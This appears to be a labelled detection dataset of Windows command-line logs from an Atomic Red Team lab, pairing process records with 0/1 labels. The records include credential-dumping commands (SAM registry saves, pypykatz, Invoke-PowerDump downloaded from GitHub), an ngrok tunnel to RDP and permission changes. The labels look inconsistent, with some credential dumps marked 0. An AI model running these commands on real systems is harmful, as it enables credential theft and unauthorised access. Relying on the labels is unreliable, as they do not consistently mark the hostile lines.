text
stringlengths
65
3.78k
label
int64
0
1
cmd.exe C:\Windows\System32\cmd.exe /c "del /A:H %temp%\T1222.001_attrib_2\T1222.001_attrib*.txt >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\lpremove.exe conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
0
cmd.exe unknown C:\Windows\System32\cmd.exe /c "rmdir /s /Q C:\AtomicRedTeam\atomics\T1560.001\victim-files >nul 2>&1" powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ar-win-2.attackrange.local Administrator
1
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd.exe C:\Windows\System32\cmd.exe /c "pypykatz live registry"
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd.exe C:\Windows\System32\cmd.exe /c "for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) && dir /B %temp%\SAMvss%a"
0
ar-win-2.attackrange.local Administrator "C:\Python311\python.exe" "C:\Python311\Scripts\pypykatz.exe" -h cmd.exe C:\Windows\system32\cmd.exe /c "ver"
0
ar-win-2.attackrange.local Administrator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES826B.tmp" "c:\Users\Administrator\AppData\Local\Temp\fgvu1b3y\CSC10AB12E1C66445FA965BE323398433A0.TMP"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"
0
ar-win-2.attackrange.local Administrator "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\1thdzlht.cmdline"
0
ar-win-2.attackrange.local Administrator "powershell.exe" & {Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""C:\AtomicRedTeam\atomics\..\ExternalPayloads\PowerDump.ps1\""} csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\fgvu1b3y\fgvu1b3y.cmdline"
0
cmd.exe C:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A winrshost.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\ansible-moduletmp-133400279192352871-275900552\enkzkman.cmdline" cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES26CE.tmp" "c:\Users\Administrator\AppData\Local\Temp\ansible-moduletmp-133400279192352871-275900552\CSC5C543E8BC582458FAEA27E59FB836A5C.TMP"
0
ar-win-2.attackrange.local Administrator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESB1B9.tmp" "c:\Users\Administrator\AppData\Local\Temp\pug2a4w5\CSC5FC7D1EA5BB6424F85C99730B1AC79A5.TMP"
0
cmd.exe "cmd.exe" /c "%%LOCALAPPDATA:~-3,1%%md /c echo Hello, from CMD! > hello.txt & type hello.txt" powershell.exe ar-win-2.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "mkdir %temp%\T1222.001_cacls & echo T1222.001_cacls1 >> %temp%\T1222.001_cacls\T1222.001_cacls1.txt & echo T1222.001_cacls2 >> %temp%\T1222.001_cacls\T1222.001_cacls2.txt" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd.exe "C:\Windows\system32\cmd.exe" /c "py -3 --version >nul 2>&1 && exit /b %errorlevel%"
0
ar-win-2.attackrange.local Administrator "cmd.exe" /c "reg save HKLM\sam %temp%\sam & reg save HKLM\system %temp%\system & reg save HKLM\security %temp%\security" reg.exe reg save HKLM\system C:\Users\ADMINI~1\AppData\Local\Temp\system
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe taskhostw.exe C:\Windows\System32\taskhostw.exe TpmTasks
0
cmd.exe "cmd.exe" /c "reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s" powershell.exe ar-win-dc.attackrange.local
1
net.exe unknown C:\Windows\System32\net.exe stop spooler cmd.exe C:\Windows\System32\cmd.exe ar-win-dc.attackrange.local Administrator
1
cmd.exe C:\Windows\system32\cmd.exe /c btool server list kvstore --no-log splunk.exe ar-win-dc.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "echo "Hello from the Windows Command Prompt!" > "%TEMP%\test.bin" & type "%TEMP%\test.bin"" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA cmd.exe "cmd.exe" /c "pip install pypykatz"
0
ar-win-2.attackrange.local Administrator "powershell.exe" & {} csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\d01zol5d\d01zol5d.cmdline"
0
cmd.exe cmd.exe /c "reg.exe save hklm\sam C:\Users\ADMINI~1\AppData\Local\Temp\cpkcnqsq" WinCreds.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Python311\python.exe cmd.exe C:\Windows\system32\cmd.exe /c "ver"
0
cmd.exe "cmd.exe" /c "sc sdset AtomicService "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)" & sc.exe delete AtomicService" powershell.exe ar-win-2.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "SCHTASKS /Delete /TN spawn /F >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== chcp.com "C:\Windows\system32\chcp.com" 65001
0
cmd.exe C:\Windows\System32\cmd.exe /c "SCHTASKS /Delete /S localhost /U DOMAIN\user /P At0micStrong /TN "Atomic task" /F >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "sc.exe create AtomicService binPath= "C:\Windows\System32\calc.exe" & sc sdset AtomicService "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"" powershell.exe ar-win-2.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "del /A:H %temp%\T1222.001_attrib_2\T1222.001_attrib*.txt >nul 2>&1" powershell.exe ar-win-2.attackrange.local
1
ngrok.exe unknown "C:\Users\Public\ngrok\ngrok.exe" tcp 3389 powershell.exe ar-win-2.attackrange.local Administrator
1
cmd.exe "C:\Windows\system32\cmd.exe" /c "if not exist "%%ProgramFiles%%\WinZip\winzip64.exe" (echo 1) else (echo 0)" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe CompatTelRunner.exe "C:\Windows\system32\compattelrunner.exe" -maintenance
0
ar-win-2.attackrange.local Administrator "powershell.exe" & {1..10 | % { rm \""$env:TEMP\SAMvss$_\"" -ErrorAction Ignore }} csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\iqg5l5hb\iqg5l5hb.cmdline"
0
ar-win-2.attackrange.local Administrator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES24DA.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCDA330A84A8B4F49B56A1CF06D1738D9.TMP"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\UsoClient.exe conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe cmd.exe C:\Windows\system32\cmd.exe /c btool server list replication_port --no-log
0
cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64 cmd.exe ar-win-dc.attackrange.local
1
cmd.exe C:\Windows\System32\cmd.exe /c "del /f /q /s %USERPROFILE%\T1560.001-data.rar >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe "cmd.exe" /c "icacls 'C:\Users\Public\*' /restore %%temp%%\T1222.001-folder-perms-backup.txt /q >nul 2>&1" powershell.exe ar-win-2.attackrange.local
1
cmd.exe "cmd.exe" /c "icacls "C:\Users\Public\*" /grant Everyone:F /T /C /Q" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Import-Module \""C:\AtomicRedTeam\atomics\..\ExternalPayloads\PowerDump.ps1\"" Invoke-PowerDump} HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\cmd.exe reg.exe C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\services.exe svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\services.exe LiteAgent.exe "C:\Program Files\Amazon\XenTools\LiteAgent.exe"
0
cmd.exe C:\Windows\System32\cmd.exe /c "mkdir C:\AtomicRedTeam\atomics\T1560.001\victim-files & cd C:\AtomicRedTeam\atomics\T1560.001\victim-files & echo "This file will be encrypted" > .\encrypted_file.txt & "%ProgramFiles%\7-zip\7z.exe" u archive.7z *txt -pblue & dir" powershell.exe ar-win-dc.attackrange.local
1
sc.exe sc.exe sc.exe stop spooler cmd.exe "cmd.exe" /c "sc.exe stop spooler" ar-win-dc.attackrange.local Administrator
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA whoami.exe "C:\Windows\system32\whoami.exe"
0
cmd.exe "cmd.exe" /c "schtasks /delete /tn "T1053_005_OnLogon" /f >nul 2>&1 & schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
0
ar-win-2.attackrange.local Administrator C:\Python311\python.exe cmd.exe C:\Windows\system32\cmd.exe /c "ver"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe cmd.exe C:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path \""C:\AtomicRedTeam\atomics\..\ExternalPayloads\PowerDump.ps1\"") {exit 0} else {exit 1}} HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
cmd.exe C:\Windows\System32\cmd.exe /c "sc.exe create AtomicService binPath= "C:\Windows\System32\calc.exe" & sc sdset AtomicService "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe unknown C:\Windows\System32\cmd.exe /c "rmdir /s /Q C:\AtomicRedTeam\atomics\T1560.001\victim-files >nul 2>&1" powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ar-win-dc.attackrange.local Administrator
1
cmd.exe C:\Windows\System32\cmd.exe /c "del C:\inetpub\wwwroot\b.jsp /q >nul 2>&1 & del C:\inetpub\wwwroot\tests.jsp /q >nul 2>&1 & del C:\inetpub\wwwroot\cmd.aspx /q >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\services.exe VSSVC.exe C:\Windows\system32\vssvc.exe
0
cmd.exe "C:\Windows\system32\cmd.exe" /c "IF EXIST %temp%\T1222.001_attrib ( EXIT 0 ) ELSE ( EXIT 1 )" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "C:\Windows\system32\cmd.exe" /c "pypykatz -h >nul 2>&1 && exit /b %errorlevel%" pypykatz.exe pypykatz -h
0
cmd.exe C:\Windows\System32\cmd.exe /c "reg query HKLM /f password /t REG_SZ /s & reg query HKCU /f password /t REG_SZ /s" powershell.exe ar-win-2.attackrange.local
1
cmd.exe C:\Windows\system32\cmd.exe /c btool server list kvstore --no-log splunk.exe ar-win-2.attackrange.local
1
net1.exe unknown C:\Windows\system32\net1 stop spooler net.exe C:\Windows\System32\net.exe ar-win-dc.attackrange.local Administrator
1
